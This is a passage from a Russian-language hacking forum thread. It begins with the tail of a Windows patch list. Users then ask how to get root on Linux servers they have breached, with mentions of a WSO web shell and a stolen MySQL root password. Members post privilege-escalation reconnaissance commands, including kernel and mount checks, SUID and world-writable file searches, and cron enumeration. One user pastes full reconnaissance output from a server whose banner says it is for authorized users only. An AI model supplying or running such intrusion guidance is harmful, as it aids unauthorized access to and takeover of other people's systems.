KB948610                            [44]: KB949189                            [45]: KB950050                            [46]: KB950760                            [47]: KB950762                            [48]: KB950974                            [49]: KB951066                            [50]: KB951698                            [51]: KB951978                            [52]: KB952004                            [53]: KB952287                            [54]: KB953733                            [55]: KB954155                            [56]: KB954459                            [57]: KB954946                            [58]: KB955020                            [59]: KB955069                            [60]: KB955302                            [61]: KB955430                            [62]: KB955839                            [63]: KB956250                            [64]: KB956572                            [65]: KB956744                            [66]: KB956802                            [67]: KB957097                            [68]: KB957200                            [69]: KB957321                            [70]: KB957388                            [71]: KB958481                            [72]: KB958483                            [73]: KB958623                            [74]: KB958624                            [75]: KB958644                            [76]: KB958687                            [77]: KB958869                            [78]: KB959130                            [79]: KB959426                            [80]: KB960225                            [81]: KB960803                            [82]: KB961371                            [83]: KB961501                            [84]: KB967723                            [85]: KB968389                            [86]: KB968537                            [87]: KB969897                            [88]: KB969897                            [89]: KB969898                            [90]: KB970238                            [91]: KB970653                            [92]: KB971029                            [93]: KB971486                            [94]: KB971557                            [95]: KB971657                            [96]: KB971930                            [97]: KB971961                            [98]: KB972036                            [99]: KB972260                            [100]: KB972270                            [101]: KB972594                            [102]: KB972636                            [103]: KB973346                            [104]: KB973507                            [105]: KB973525                            [106]: KB973565                            [107]: KB973687                            [108]: KB973874                            [109]: KB973917                            [110]: KB974318                            [111]: KB974455                            [112]: KB974469                            [113]: KB974571                            [114]: KB975364                            [115]: KB975467                            [116]: KB975517                            [117]: KB975560                            [118]: KB975562                            [119]: KB975929                            [120]: KB976323                            [121]: KB976470                            [122]: KB976749                            [123]: KB976767                            [124]: KB976771                            [125]: KB978542                            [126]: KB978601                            [127]: KB978886                            [128]: KB979099                            [129]: KB979309                            [130]: KB979482                            [131]: KB979687                            [132]: KB979688                            [133]: KB979911                            [134]: KB980248                            [135]: KB980843                            [136]: KB981322                            [137]: KB982132                            [138]: KB982799                            [139]: KB968930
    Есть ли способ залить бинарный файл через mysql?(wso и пароль root мускуля в наличии)
    Заранее спасибо.
     
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,518
    Likes Received:
    401
    Reputations:
    196
    Реально ли порутать?

    2.6.32.45-grsec-2.2.2-r3 #8 SMP Mon Oct 10 13:33:17 PDT 2011 x86_64
     
  18. termigor

    termigor New Member

    Joined:
    18 Dec 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    uname -a
    ls -la /boot
    ls -la --full-time /lib/lib*
    mount
    df -h
    cat /etc/issue
    cat /etc/crontab
    cat /proc/version
    cat /proc/sys/vm/mmap_min_addr
    pwd
    ls -la /usr/bin/staprun
     
  19. rolexlease

    rolexlease New Member

    Joined:
    26 Jul 2012
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Linux 2.6.18-194.17.1.el5 #1 SMP Wed Sep 29 12:50:31 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux

    ----------------

    $ ls -la /boot
    total 6060
    drwxr-xr-x 4 root root 1024 Oct 17 2010 .
    drwxr-xr-x 28 root root 4096 Jan 19 08:31 ..
    -rw-r--r-- 1 root root 163 Sep 29 2010 .vmlinuz-2.6.18-194.17.1.el5.hmac
    -rw-r--r-- 1 root root 1243411 Sep 29 2010 System.map-2.6.18-194.17.1.el5
    -rw-r--r-- 1 root root 66892 Sep 29 2010 config-2.6.18-194.17.1.el5
    drwxr-xr-x 2 root root 1024 Jan 9 04:38 grub
    -rw------- 1 root root 2692659 Oct 17 2010 initrd-2.6.18-194.17.1.el5.img
    drwx------ 2 root root 12288 Aug 27 2010 lost+found
    -rw-r--r-- 1 root root 80032 Mar 16 2009 message
    -rw-r--r-- 1 root root 112729 Sep 29 2010 symvers-2.6.18-194.17.1.el5.gz
    -rw-r--r-- 1 root root 1955036 Sep 29 2010 vmlinuz-2.6.18-194.17.1.el5

    ----------------------

    $ ls -la --full-time /lib/lib*
    -rwxr-xr-x 1 root root 7664 2013-01-08 08:33:15.000000000 -0500 /lib/libBrokenLocale-2.5.so
    lrwxrwxrwx 1 root root 22 2013-01-22 04:27:47.000000000 -0500 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.5.so
    -rwxr-xr-x 1 root root 16704 2013-01-08 08:33:15.000000000 -0500 /lib/libSegFault.so
    -rwxr-xr-x 1 root root 14128 2013-01-08 08:33:15.000000000 -0500 /lib/libanl-2.5.so
    lrwxrwxrwx 1 root root 13 2013-01-22 04:27:47.000000000 -0500 /lib/libanl.so.1 -> libanl-2.5.so
    lrwxrwxrwx 1 root root 18 2010-08-27 16:15:20.000000000 -0400 /lib/libasound.so.2 -> libasound.so.2.0.0
    -rwxr-xr-x 1 root root 907328 2009-01-20 22:47:23.000000000 -0500 /lib/libasound.so.2.0.0
    lrwxrwxrwx 1 root root 17 2012-03-29 04:35:54.000000000 -0400 /lib/libaudit.so.0 -> libaudit.so.0.0.0
    -rwxr-xr-x 1 root root 95740 2012-02-22 10:10:06.000000000 -0500 /lib/libaudit.so.0.0.0
    lrwxrwxrwx 1 root root 19 2012-03-29 04:35:54.000000000 -0400 /lib/libauparse.so.0 -> libauparse.so.0.0.0
    -rwxr-xr-x 1 root root 58932 2012-02-22 10:10:06.000000000 -0500 /lib/libauparse.so.0.0.0
    lrwxrwxrwx 1 root root 15 2013-01-22 04:27:50.000000000 -0500 /lib/libblkid.so.1 -> libblkid.so.1.0
    -rwxr-xr-x 1 root root 36708 2013-01-09 00:06:41.000000000 -0500 /lib/libblkid.so.1.0
    -rwxr-xr-x 1 root root 1702816 2013-01-08 08:33:15.000000000 -0500 /lib/libc-2.5.so
    lrwxrwxrwx 1 root root 11 2013-01-22 04:27:47.000000000 -0500 /lib/libc.so.6 -> libc-2.5.so
    lrwxrwxrwx 1 root root 14 2010-08-27 16:15:20.000000000 -0400 /lib/libcap.so.1 -> libcap.so.1.10
    -rwxr-xr-x 1 root root 11560 2007-03-14 14:15:10.000000000 -0400 /lib/libcap.so.1.10
    -rwxr-xr-x 1 root root 191708 2013-01-08 08:33:15.000000000 -0500 /lib/libcidn-2.5.so
    lrwxrwxrwx 1 root root 14 2013-01-22 04:27:47.000000000 -0500 /lib/libcidn.so.1 -> libcidn-2.5.so
    lrwxrwxrwx 1 root root 17 2013-01-22 04:27:50.000000000 -0500 /lib/libcom_err.so.2 -> libcom_err.so.2.1
    -rwxr-xr-x 1 root root 6364 2013-01-09 00:06:41.000000000 -0500 /lib/libcom_err.so.2.1
    -rwxr-xr-x 1 root root 43616 2013-01-08 08:33:16.000000000 -0500 /lib/libcrypt-2.5.so
    lrwxrwxrwx 1 root root 15 2013-01-22 04:27:47.000000000 -0500 /lib/libcrypt.so.1 -> libcrypt-2.5.so
    -rwxr-xr-x 1 root root 1296512 2012-05-29 18:40:41.000000000 -0400 /lib/libcrypto.so.0.9.8e
    lrwxrwxrwx 1 root root 14 2010-08-27 16:15:20.000000000 -0400 /lib/libcrypto.so.4 -> libcrypto.so.6
    lrwxrwxrwx 1 root root 19 2012-06-01 04:20:00.000000000 -0400 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
    -rwxr-xr-x 1 root root 838860 2007-01-07 00:37:48.000000000 -0500 /lib/libdb-4.1.so
    -rwxr-xr-x 1 root root 934132 2007-01-07 00:37:48.000000000 -0500 /lib/libdb-4.2.so
    -rwxr-xr-x 1 root root 1010204 2010-07-12 12:11:02.000000000 -0400 /lib/libdb-4.3.so
    -rwxr-xr-x 1 root root 905704 2007-01-07 00:37:48.000000000 -0500 /lib/libdb_cxx-4.1.so
    -rwxr-xr-x 1 root root 1019472 2007-01-07 00:37:48.000000000 -0500 /lib/libdb_cxx-4.2.so
    lrwxrwxrwx 1 root root 18 2011-11-16 04:28:47.000000000 -0500 /lib/libdbus-1.so.3 -> libdbus-1.so.3.4.0
    -rwxr-xr-x 1 root root 253392 2011-08-11 13:33:53.000000000 -0400 /lib/libdbus-1.so.3.4.0
    -r--r--r-- 1 root root 45098 2012-02-22 12:26:24.000000000 -0500 /lib/libdevmapper-event.a
    lrwxrwxrwx 1 root root 26 2012-03-29 04:35:49.000000000 -0400 /lib/libdevmapper-event.so -> libdevmapper-event.so.1.02
    -r-xr-xr-x 1 root root 18488 2012-02-22 12:26:32.000000000 -0500 /lib/libdevmapper-event.so.1.02
    -r--r--r-- 1 root root 496324 2012-02-22 12:26:17.000000000 -0500 /lib/libdevmapper.a
    lrwxrwxrwx 1 root root 20 2012-03-29 04:35:49.000000000 -0400 /lib/libdevmapper.so -> libdevmapper.so.1.02
    -r-xr-xr-x 1 root root 163292 2012-02-22 12:26:32.000000000 -0500 /lib/libdevmapper.so.1.02
    -rwxr-xr-x 1 root root 18812 2013-01-08 08:33:16.000000000 -0500 /lib/libdl-2.5.so
    lrwxrwxrwx 1 root root 12 2013-01-22 04:27:47.000000000 -0500 /lib/libdl.so.2 -> libdl-2.5.so
    lrwxrwxrwx 1 root root 13 2013-01-22 04:27:50.000000000 -0500 /lib/libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x 1 root root 20192 2013-01-09 00:06:41.000000000 -0500 /lib/libe2p.so.2.3
    lrwxrwxrwx 1 root root 17 2012-06-15 04:15:17.000000000 -0400 /lib/libexpat.so.0 -> libexpat.so.0.5.0
    -rwxr-xr-x 1 root root 135932 2012-06-13 10:35:31.000000000 -0400 /lib/libexpat.so.0.5.0
    lrwxrwxrwx 1 root root 16 2013-01-22 04:27:50.000000000 -0500 /lib/libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x 1 root root 113892 2013-01-09 00:06:41.000000000 -0500 /lib/libext2fs.so.2.4
    -rwxr-xr-x 1 root root 45192 2013-01-08 13:20:59.000000000 -0500 /lib/libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx 1 root root 28 2013-01-22 04:27:51.000000000 -0500 /lib/libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx 1 root root 23 2010-08-27 16:15:20.000000000 -0400 /lib/libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 644472 2009-03-24 21:52:17.000000000 -0400 /lib/libglib-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root 26 2010-08-27 16:15:20.000000000 -0400 /lib/libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 11396 2009-03-24 21:52:17.000000000 -0400 /lib/libgmodule-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root 26 2010-08-27 16:15:20.000000000 -0400 /lib/libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 259128 2009-03-24 21:52:17.000000000 -0400 /lib/libgobject-2.0.so.0.1200.3
    lrwxrwxrwx 1 root root 26 2010-08-27 16:15:20.000000000 -0400 /lib/libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 14660 2009-03-24 21:52:17.000000000 -0400 /lib/libgthread-2.0.so.0.1200.3
    -rwxr-xr-x 1 root root 6404 2007-01-06 02:57:38.000000000 -0500 /lib/libkeyutils-1.2.so
    lrwxrwxrwx 1 root root 18 2010-08-27 16:15:20.000000000 -0400 /lib/libkeyutils.so.1 -> libkeyutils-1.2.so
    -rwxr-xr-x 1 root root 214572 2013-01-08 08:33:16.000000000 -0500 /lib/libm-2.5.so
    lrwxrwxrwx 1 root root 11 2013-01-22 04:27:47.000000000 -0500 /lib/libm.so.6 -> libm-2.5.so
    -rwxr-xr-x 1 root root 107924 2013-01-08 08:33:16.000000000 -0500 /lib/libnsl-2.5.so
    lrwxrwxrwx 1 root root 13 2013-01-22 04:27:47.000000000 -0500 /lib/libnsl.so.1 -> libnsl-2.5.so
    -rwxr-xr-x 1 root root 36468 2013-01-08 08:33:16.000000000 -0500 /lib/libnss_compat-2.5.so
    lrwxrwxrwx 1 root root 20 2013-01-22 04:27:47.000000000 -0500 /lib/libnss_compat.so.2 -> libnss_compat-2.5.so
    -rwxr-xr-x 1 root root 825028 2010-05-13 07:02:40.000000000 -0400 /lib/libnss_db-2.2.so
    lrwxrwxrwx 1 root root 16 2010-08-27 16:15:20.000000000 -0400 /lib/libnss_db.so.2 -> libnss_db-2.2.so
    -rwxr-xr-x 1 root root 21948 2013-01-08 08:33:16.000000000 -0500 /lib/libnss_dns-2.5.so
    lrwxrwxrwx 1 root root 17 2013-01-22 04:27:47.000000000 -0500 /lib/libnss_dns.so.2 -> libnss_dns-2.5.so
    -rwxr-xr-x 1 root root 50848 2013-01-08 08:33:16.000000000 -0500 /lib/libnss_files-2.5.so
    lrwxrwxrwx 1 root root 19 2013-01-22 04:27:47.000000000 -0500 /lib/libnss_files.so.2 -> libnss_files-2.5.so
    -rwxr-xr-x 1 root root 22764 2013-01-08 08:33:16.000000000 -0500 /lib/libnss_hesiod-2.5.so
    lrwxrwxrwx 1 root root 20 2013-01-22 04:27:47.000000000 -0500 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
    -rwxr-xr-x 1 root root 46624 2013-01-08 08:33:16.000000000 -0500 /lib/libnss_nis-2.5.so
    lrwxrwxrwx 1 root root 17 2013-01-22 04:27:47.000000000 -0500 /lib/libnss_nis.so.2 -> libnss_nis-2.5.so
    -rwxr-xr-x 1 root root 55804 2013-01-08 08:33:17.000000000 -0500 /lib/libnss_nisplus-2.5.so
    lrwxrwxrwx 1 root root 21 2013-01-22 04:27:47.000000000 -0500 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
    lrwxrwxrwx 1 root root 16 2013-01-22 04:27:54.000000000 -0500 /lib/libpam.so.0 -> libpam.so.0.81.5
    -rwxr-xr-x 1 root root 43020 2013-01-09 00:30:33.000000000 -0500 /lib/libpam.so.0.81.5
    lrwxrwxrwx 1 root root 21 2013-01-22 04:27:54.000000000 -0500 /lib/libpam_misc.so.0 -> libpam_misc.so.0.81.2
    -rwxr-xr-x 1 root root 8624 2013-01-09 00:30:33.000000000 -0500 /lib/libpam_misc.so.0.81.2
    lrwxrwxrwx 1 root root 17 2013-01-22 04:27:54.000000000 -0500 /lib/libpamc.so.0 -> libpamc.so.0.81.0
    -rwxr-xr-x 1 root root 9868 2013-01-09 00:30:33.000000000 -0500 /lib/libpamc.so.0.81.0
    lrwxrwxrwx 1 root root 16 2012-02-09 05:28:29.000000000 -0500 /lib/libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x 1 root root 127760 2011-03-30 20:08:14.000000000 -0400 /lib/libpcre.so.0.0.1
    -rwxr-xr-x 1 root root 135928 2013-01-08 08:33:17.000000000 -0500 /lib/libpthread-2.5.so
    lrwxrwxrwx 1 root root 17 2013-01-22 04:27:47.000000000 -0500 /lib/libpthread.so.0 -> libpthread-2.5.so
    -rwxr-xr-x 1 root root 83048 2013-01-08 08:33:17.000000000 -0500 /lib/libresolv-2.5.so
    lrwxrwxrwx 1 root root 16 2013-01-22 04:27:47.000000000 -0500 /lib/libresolv.so.2 -> libresolv-2.5.so
    -rwxr-xr-x 1 root root 46144 2013-01-08 08:33:17.000000000 -0500 /lib/librt-2.5.so
    lrwxrwxrwx 1 root root 12 2013-01-22 04:27:47.000000000 -0500 /lib/librt.so.1 -> librt-2.5.so
    -rwxr-xr-x 1 root root 91892 2011-03-05 23:51:56.000000000 -0500 /lib/libselinux.so.1
    -rwxr-xr-x 1 root root 243928 2010-03-31 04:26:18.000000000 -0400 /lib/libsepol.so.1
    lrwxrwxrwx 1 root root 12 2013-01-22 04:27:50.000000000 -0500 /lib/libss.so.2 -> libss.so.2.0
    -rwxr-xr-x 1 root root 19008 2013-01-09 00:06:41.000000000 -0500 /lib/libss.so.2.0
    -rwxr-xr-x 1 root root 291436 2012-05-29 18:40:41.000000000 -0400 /lib/libssl.so.0.9.8e
    lrwxrwxrwx 1 root root 11 2010-08-27 16:15:20.000000000 -0400 /lib/libssl.so.4 -> libssl.so.6
    lrwxrwxrwx 1 root root 16 2012-06-01 04:20:00.000000000 -0400 /lib/libssl.so.6 -> libssl.so.0.9.8e
    lrwxrwxrwx 1 root root 19 2010-08-27 16:15:20.000000000 -0400 /lib/libtermcap.so.2 -> libtermcap.so.2.0.8
    -rwxr-xr-x 1 root root 11636 2007-01-06 08:01:17.000000000 -0500 /lib/libtermcap.so.2.0.8
    -rwxr-xr-x 1 root root 33852 2013-01-08 08:33:17.000000000 -0500 /lib/libthread_db-1.0.so
    lrwxrwxrwx 1 root root 19 2013-01-22 04:27:47.000000000 -0500 /lib/libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x 1 root root 13492 2013-01-08 08:33:17.000000000 -0500 /lib/libutil-2.5.so
    lrwxrwxrwx 1 root root 14 2013-01-22 04:27:47.000000000 -0500 /lib/libutil.so.1 -> libutil-2.5.so
    lrwxrwxrwx 1 root root 14 2013-01-22 04:27:50.000000000 -0500 /lib/libuuid.so.1 -> libuuid.so.1.2
    -rwxr-xr-x 1 root root 14472 2013-01-09 00:06:41.000000000 -0500 /lib/libuuid.so.1.2
    lrwxrwxrwx 1 root root 22 2013-01-22 04:27:55.000000000 -0500 /lib/libvolume_id.so.0 -> libvolume_id.so.0.66.0
    -rwxr-xr-x 1 root root 37032 2013-01-09 01:09:06.000000000 -0500 /lib/libvolume_id.so.0.66.0
    lrwxrwxrwx 1 root root 16 2010-08-27 16:15:20.000000000 -0400 /lib/libwrap.so.0 -> libwrap.so.0.7.6
    -rwxr-xr-x 1 root root 31344 2009-09-21 18:37:30.000000000 -0400 /lib/libwrap.so.0.7.6
    lrwxrwxrwx 1 root root 13 2013-01-22 04:28:08.000000000 -0500 /lib/libz.so -> libz.so.1.2.3
    lrwxrwxrwx 1 root root 13 2013-01-22 04:27:50.000000000 -0500 /lib/libz.so.1 -> libz.so.1.2.3
    -rwxr-xr-x 1 root root 73640 2012-07-17 04:32:17.000000000 -0400 /lib/libz.so.1.2.3

    -----------------------

    $ mount
    /dev/hda3 on / type ext3 (rw,usrquota)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    /dev/hda1 on /boot type ext3 (rw)
    tmpfs on /dev/shm type tmpfs (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)
    /tmp on /var/tmp type none (rw,noexec,nosuid,bind)

    --------------

    $ df -h
    Filesystem Size Used Avail Use% Mounted on
    /dev/hda3 294G 199G 95G 68% /
    /dev/hda1 99M 12M 82M 13% /boot
    tmpfs 1.8G 0 1.8G 0% /dev/shm
    /usr/tmpDSK 1.9G 174M 1.7G 10% /tmp

    -------------

    $ cat /etc/issue
    This computer system is for authorized users only. Individuals using this
    system without authority or in excess of their authority are subject to
    having all their activities on this system monitored and recorded or
    examined by any authorized person, including law enforcement, as system
    personnel deem appropriate. In the course of monitoring individuals
    improperly using the system or in the course of system maintenance, the
    activities of authorized users may also be monitored and recorded. Any
    material so recorded may be disclosed as appropriate. Anyone using this
    system consents to these terms.

    --------------------

    $ cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/

    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly

    -------------------

    $ cat /proc/version
    Linux version 2.6.18-194.17.1.el5 ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Wed Sep 29 12:50:31 EDT 2010

    ---------------------

    $ cat /proc/sys/vm/mmap_min_addr

    ---------------------

    $ ls -la /usr/bin/staprun
    ---s--x--- 1 root stapusr 166608 Jan 9 07:10 /usr/bin/staprun

    -------------------


    Kak sdelat root??
     
  20. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    2 rolexlease покажи
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    find / -perm -a+w -type f -ls 2>/dev/nul
    find / -perm -a+w -type d -ls 2>/dev/nul
    И
    ls -la /etc/cron.d (+ cat каждый файл из диры)
    ls -la /etc/cron.hourly (+ cat каждый файл из диры)
    ls -la /etc/cron.monthly (+ cat каждый файл из диры)
    ls -la /etc/cron.weekly (+ cat каждый файл из диры)